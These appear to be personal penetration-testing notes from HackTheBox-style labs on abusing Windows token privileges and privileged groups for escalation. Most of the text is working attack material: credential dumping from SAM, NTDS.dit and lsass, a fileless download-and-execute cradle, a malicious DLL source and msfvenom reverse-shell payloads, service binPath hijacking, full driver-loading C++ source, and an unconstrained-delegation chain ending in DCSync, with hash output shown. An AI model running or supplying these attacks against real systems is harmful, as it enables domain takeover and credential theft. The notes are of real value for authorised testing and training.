Abuse Tokens

Enable all default token service account

If you compromise and service account for example svc_mssql account and the permission are disabled you can use the next tool to enable them.

GitHub - itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE accountGitHub

SeImpersonate and SeAssignPrimaryToken

Favorite tool: GodPotato (Windows Server 2019/2022)

Tools:

• PrintSpoofer

• RoguePotato

• SharpEfsPotato

• EfsPotato

• DCOMPotato

CLSIDS working for Windows 2019/2022

c980e4c2-c178-4572-935d-a8a429884806  
90f18417-f0f1-484e-9d3c-59dceee5dbd8  
03ca98d6-ff5d-49b8-abc6-03dd84127020  
d99e6e73-fc88-11d0-b498-00a0c90312f3  
42cbfaa7-a4a7-47bb-b422-bd10e9d02700  
000c101c-0000-0000-c000-000000000046  
1bf48339-d15e-45f3-ad55-a851cb66be6b  
49e6370b-ab71-40ab-92f4-b009539e4518  
50d185b9-fff3-4656-92c7-e4018da4361d  
3c6859ce-230b-484d-be6c-9320c0202408

Backup Operators

Backup Operators is a built-in Windows security group that allows members to back up and restore files, directories, and registry keys regardless of existing file permissions, ownership, or encryption settings. They are designed to manage system backups without requiring full administrative rights.

NetExec

*Evil-WinRM* PS C:\Temp> reg save hklm\sam c:\temp\sam
*Evil-WinRM* PS C:\Temp> reg save hklm\system c:\temp\system

❯ impacket-secretsdump -system SYSTEM.save -sam SAM.save LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Impacket

Windows registry hives

BackupOperatorToDA

DiskShadow

SeTakeOwnershipPrivilege

takeownMicrosoftLearn

GitHub - fashionproof/EnableAllTokenPrivsGitHub

PS C:\\htb> Import-Module .\\Enable-Privilege.ps1
PS C:\\htb> .\\EnableAllTokenPrivs.ps1
PS C:\\htb> whoami /priv

filess method:
IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.123/EnableAllTokenPrivs.ps1>');

#Check File permission
PS C:\\htb> Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

PS C:\\htb>takeown /f 'C:\\some\\file.txt' #Now the file is owned by you
PS C:\\htb> icacls 'C:\\some\\file.txt' /grant <your_username>:F #Now you have full access
# Use this with files that might contain credentials such as
%WINDIR%\\repair\\sam
%WINDIR%\\repair\\system
%WINDIR%\\repair\\software
%WINDIR%\\repair\\security
%WINDIR%\\system32\\config\\security.sav
%WINDIR%\\system32\\config\\software.sav
%WINDIR%\\system32\\config\\system.sav
%WINDIR%\\system32\\config\\SecEvent.Evt
%WINDIR%\\system32\\config\\default.sav
c:\\inetpub\\wwwwroot\\web.config

SeDebugPrivilege

ProcDump - SysinternalsMicrosoftLearn

• SeDebugPrivilege-Exploit (C++)

• SeDebugPrivilegePoC (C#)

• psgetsys.ps1 (Powershell Script)

C:\\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp

Mimikatz
sekurlsa::minidump lsass.dmp 
sekurlsa::logonpasswords

PS C:\\htb> Import-Module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)

Event Log Readers

Members of this group can read event logs from local computers. The group is created when the server is promoted to a domain controller.

Process Name generated: 4688(S): A new process has been created. (This event generates every time a new process starts.)

#Searching Security Logs Using wevtutil
PS C:\\htb> wevtutil qe Security /rd:true /f:text | Select-String "/user"

C:\\htb> wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

#Searching Security Logs Using Get-WinEvent
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

Note: Searching the Security event log with Get-WInEvent requires administrator access or permissions adjusted on the registry key HKLM\\System\\CurrentControlSet\\Services\\Eventlog\\Security. Membership in just the Event Log Readers group is not sufficient.

SeBackupPrivilege

• SeBackupPrivilegeUtils.dll

• SeBackupPrivilegeCmdLets.dll

#Import Libraries
PS C:\\htb> Import-Module .\\SeBackupPrivilegeUtils.dll
PS C:\\htb> Import-Module .\\SeBackupPrivilegeCmdLets.dll
#Enabling SeBackupPrivilege
PS C:\\htb> Set-SeBackupPrivilege
PS C:\\htb> Get-SeBackupPrivilege

#Abusing of seBackupPrivilege
PS C:\\htb> Copy-FileSeBackupPrivilege 'C:\\Confidential\\2021 Contract.txt' .\\Contract.txt
PS C:\\htb> Copy-FileSeBackupPrivilege E:\\Windows\\NTDS\\ntds.dit C:\\Tools\\ntds.dit

#Attacking a Domain Controller - Copying NTDS.dit 
PS C:\\htb> diskshadow.exe

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  10/14/2020 12:57:52 AM

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\\Windows\\Temp\\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

PS C:\\htb> dir E:

# Backing up SAM and SYSTEM Registry Hives
C:\\htb> reg save HKLM\\SYSTEM SYSTEM.SAV
C:\\htb> reg save HKLM\\SAM SAM.SAV

#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

#Copying Files with Robocopy
C:\\htb> robocopy /B E:\\Windows\\NTDS .\\ntds ntds.dit

DnsAdmins

Malicious Custom DLL

Intrusionz3r0@htb[/htb]$ x86_64-w64-mingw32-gcc -o pwn.dll pwn.c -shared

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int pwn()
{
	system("COMMAND-HERE");
	return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		pwn();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

#Create Maicious DLL by using msfvenom
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -a x64 -f dll > rev.dll

#Loading Custom DLL
C:\\htb> dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
C:\\htb> sc stop dns
C:\\htb> sc start dns

#Clean up (Run as Administrator Shell)
C:\\htb> reg query \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters
C:\\htb> reg delete \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters  /v ServerLevelPluginDll
C:\\htb> sc.exe start dns
C:\\htb> sc query dns

#Disabling the Global Query Block List
C:\\htb> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
C:\\htb> Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3

Hyper-V Administrators

https://github.com/decoder-it/Hyper-V-admin-EOP/

#Starting the Mozilla Maintenance Service
C:\\htb> takeown /F C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe
#Starting the Mozilla Maintenance Service
C:\\htb> sc.exe start MozillaMaintenance

SeEnableDelegationPrivilege

If you possess the ability to add computer SeMachineAccountPrivilege and SeEnableDelegationPrivilege you can abuse oof unconstrained delegation.

Windows

Adding Computer to the domain controller

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account EVIL added

Enabling unconstrained delegation

UserAccountControl Values: useraccountcontrol-manipulate-account-properties

Property flag	Value in decimal	Why?
WORKSTATION_TRUST_ACCOUNT	4096	Indicate is a machine account (mandatory)
TRUSTED_FOR_DELEGATION	524288	Enable Unconstrained Delegation

Total: 524288 + 4096 = 528384

#Enable unconstrained delegation by setting the userAccountControl attribute to 528384
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute useraccountcontrol -Value 528384
[+] Machine account evil attribute useraccountcontrol updated

Adding a malicious HTTP SPN

Note: make computer look like a real service by adding SPN HTTP/EVIL.delegate.vl

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Value HTTP/EVIL.delegate.vl -Append
[+] Machine account evil attribute ServicePrincipalName appended

Checking the configuration applied

*Evil-WinRM* PS C:\Users\N.Thompson\Documents>  Get-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=evil,CN=Computers,DC=delegate,DC=vl
HTTP/EVIL.delegate.vl
RestrictedKrbHost/EVIL
HOST/EVIL
RestrictedKrbHost/EVIL.delegate.vl
HOST/EVIL.delegate.vl

Adding a malicious DNS

❯ python3 dnstool.py -u 'delegate.vl\evil$' -p 'Password123' -r evil.delegate.vl -d 10.8.5.48 -a add dc1.delegate.vl -dns-ip 10.10.111.117
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Take time to replicate you can use nslookup evil.delegate.vl dc1.delegate.vl to sure is replicated into AD.

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71

Use: pypykatz crypto nt 'Password123'

Coercing the authentication to malicious dns

❯ python3 printerbug.py delegate.vl/'EVIL$:Password123'@10.10.111.117 evil.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.111.117
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Capturing the NT Hash via unconstrated delegation

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.111.117
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack against domain controller.

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
<SNIF>

Linux

Creating a machine account

❯ impacket-addcomputer  delegate.vl/N.Thompson:KALEB_2341 -computer-name z3r0 -computer-pass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account z3r0$ with password Password123.

Adding the UserControlAccount attributes

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f WORKSTATION_TRUST_ACCOUNT
[-] ['WORKSTATION_TRUST_ACCOUNT'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'useraccountcontrol'

Adding HTTP/CIFS SPN's to rogue computer

❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'CIFS/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl

Checking the ServicePrincipalName

bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'serviceprincipalname'

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80

Coercing the authentication to malicious dns

❯ python3 printerbug.py 'delegate.vl/z3r0$:Password123'@10.10.79.76 z3r0.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.79.76
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Output from krbrelayx and printerbugshe;

[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.79.76
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up... 

Server Operators

PsService - SysinternalsMicrosoftLearn

#Querying the AppReadiness Service to check the status
C:\htb> sc qc AppReadiness

#C:\\htb> c:\\Tools\\PsService.exe security AppReadiness
C:\htb> c:\Tools\PsService.exe security AppReadiness

#Modifying the Service Binary Path (Abuse)
C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

#Starting the Service
C:\htb> sc start AppReadiness

Print Operators

If we issue the command whoami /priv, and don't see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC.

https://www.nirsoft.net/utils/driverview.html#google_vignette

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

/*
Reference:
Compile: sudo apt install mingw-w64 -y && x86_64-w64-mingw32-g++ -o EnableSeLoadDriverPrivilege.exe EnableSeLoadDriverPrivilege.cpp -DUNICODE -D_UNICODE
<https://github.com/hatRiot/token-priv>
<https://github.com/TarlogicSecurity/EoPLoadDriver>

Enable the SeLoadDriverPrivilege of current process and then load the driver into the kernel.

First you need to add two reg keys,the command is:
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\test\\Capcom.sys"
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v Type /t REG_DWORD /d 1
Then run me to load the driver(C:\\test\\Capcom.sys) into the kernel.

We will have all access on the system.
*/

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"
#pragma comment(lib,"advapi32.lib") 
#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"Ntdll.lib")

LPWSTR getUserSid(HANDLE hToken)
{

	// Get the size of the memory buffer needed for the SID
	//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
	//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx

	DWORD dwBufferSize = 0;
	if (!GetTokenInformation(hToken, TokenUser, NULL, 0, &dwBufferSize) &&
		(GetLastError() != ERROR_INSUFFICIENT_BUFFER))
	{
		wprintf(L"GetTokenInformation failed, error: %d\\n",
			GetLastError());
		return NULL;
	}

	//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
	PTOKEN_USER pUserToken = (PTOKEN_USER)HeapAlloc(
		GetProcessHeap(),
		HEAP_ZERO_MEMORY,
		dwBufferSize);

	if (pUserToken == NULL) {
		HeapFree(GetProcessHeap(), 0, (LPVOID)pUserToken);
		return NULL;
	}

	// Retrive token info
	if (!GetTokenInformation(
		hToken,
		TokenUser,
		pUserToken,
		dwBufferSize,
		&dwBufferSize))
	{
		GetLastError();
		return NULL;
	}

	// Check if SID is valid
	if (!IsValidSid(pUserToken->User.Sid))
	{
		wprintf(L"The owner SID is invalid.\\n");
		return NULL;
	}

	LPWSTR sidString;
	ConvertSidToStringSidW(pUserToken->User.Sid, &sidString);
	return sidString;
}

ULONG
LoadDriver(HANDLE hToken)
{
	UNICODE_STRING DriverServiceName;
	ULONG dwErrorCode;
	NTSTATUS status;

	typedef NTSTATUS(_stdcall *NT_LOAD_DRIVER)(IN PUNICODE_STRING DriverServiceName);
	typedef void (WINAPI* RTL_INIT_UNICODE_STRING)(PUNICODE_STRING, PCWSTR);

	NT_LOAD_DRIVER NtLoadDriver = (NT_LOAD_DRIVER)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtLoadDriver");
	RTL_INIT_UNICODE_STRING RtlInitUnicodeString = (RTL_INIT_UNICODE_STRING)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");

	LPWSTR win7regPath = new WCHAR[MAX_PATH];
	ZeroMemory(win7regPath, MAX_PATH);
	LPWSTR userSidStr;
	userSidStr = getUserSid(hToken);
	if (userSidStr == NULL)
	{
		wprintf(L"[+] Error while getting user SID\\n");
		CloseHandle(hToken);
		hToken = NULL;
	}

	lstrcat(win7regPath, L"\\\\Registry\\\\User\\\\");
	lstrcat(win7regPath, userSidStr);
	lstrcat(win7regPath, L"\\\\System\\\\CurrentControlSet\\\\CAPCOM");

	RtlInitUnicodeString(&DriverServiceName, win7regPath);

	status = NtLoadDriver(&DriverServiceName);
	printf("NTSTATUS: %08x, WinError: %d\\n", status, GetLastError());

	if (!NT_SUCCESS(status))
		return RtlNtStatusToDosError(status);

	return 0;
}

int IsTokenSystem(HANDLE tok)
{
	DWORD Size, UserSize, DomainSize;
	SID *sid;
	SID_NAME_USE SidType;
	TCHAR UserName[64], DomainName[64];
	TOKEN_USER *User;
	Size = 0;
	GetTokenInformation(tok, TokenUser, NULL, 0, &Size);
	if (!Size)
		return 0;

	User = (TOKEN_USER *)malloc(Size);
	assert(User);
	GetTokenInformation(tok, TokenUser, User, Size, &Size);
	assert(Size);
	Size = GetLengthSid(User->User.Sid);
	assert(Size);
	sid = (SID *)malloc(Size);
	assert(sid);

	CopySid(Size, sid, User->User.Sid);
	UserSize = (sizeof UserName / sizeof *UserName) - 1;
	DomainSize = (sizeof DomainName / sizeof *DomainName) - 1;
	LookupAccountSid(NULL, sid, UserName, &UserSize, DomainName, &DomainSize, &SidType);
	free(sid);

	printf("whoami:\\n%S\\\\%S\\n", DomainName, UserName);
	if (!_wcsicmp(UserName, L"SYSTEM"))
		return 0;
	return 1;
}

VOID RetPrivDwordAttributesToStr(DWORD attributes, LPTSTR szAttrbutes)
{
	UINT len = 0;
	if (attributes & SE_PRIVILEGE_ENABLED)
		len += wsprintf(szAttrbutes, TEXT("Enabled"));
	if (attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT)
		len += wsprintf(szAttrbutes, TEXT("Enabled by default"));
	if (attributes & SE_PRIVILEGE_REMOVED)
		len += wsprintf(szAttrbutes, TEXT("Removed"));
	if (attributes & SE_PRIVILEGE_USED_FOR_ACCESS)
		len += wsprintf(szAttrbutes, TEXT("Used for access"));
	if (szAttrbutes[0] == 0)
		wsprintf(szAttrbutes, TEXT("Disabled"));
	return;
}

int GetTokenPrivilege(HANDLE tok)
{
	PTOKEN_PRIVILEGES ppriv = NULL;
	DWORD dwRet = 0;
	GetTokenInformation(tok, TokenGroups, ppriv, dwRet, &dwRet);
	if (!dwRet)
		return 0;
	ppriv = (PTOKEN_PRIVILEGES)calloc(dwRet, 1);
	GetTokenInformation(tok, TokenPrivileges, ppriv, dwRet, &dwRet);
	printf("\\nwhoami /priv\\n");
	for (int i = 0; i < ppriv->PrivilegeCount; i++)
	{
		TCHAR lpszPriv[MAX_PATH] = { 0 };
		DWORD dwRet = MAX_PATH;
		BOOL n = LookupPrivilegeName(NULL, &(ppriv->Privileges[i].Luid), lpszPriv, &dwRet);
		printf("%-50ws", lpszPriv);
		TCHAR lpszAttrbutes[1024] = { 0 };
		RetPrivDwordAttributesToStr(ppriv->Privileges[i].Attributes, lpszAttrbutes);
		printf("%ws\\n", lpszAttrbutes);
	}
	return 1;
}

BOOL EnablePriv(HANDLE hToken, LPCTSTR priv)
{

	TOKEN_PRIVILEGES tp;
	LUID luid;

	if (!LookupPrivilegeValue(NULL, priv, &luid))
	{
		printf("[!]LookupPrivilegeValue error\\n");
		return 0;
	}
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
	{
		printf("[!]AdjustTokenPrivileges error\\n");
		return 0;
	}

	IsTokenSystem(hToken);
	GetTokenPrivilege(hToken);

	return TRUE;
}

int _tmain(int argc, _TCHAR* argv[])
{
	HANDLE hToken;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
	{
		printf("[!]OpenProcessToken error\\n");
		return 0;
	}

	EnablePriv(hToken, SE_LOAD_DRIVER_NAME);
	LoadDriver(hToken);
	return 0;
}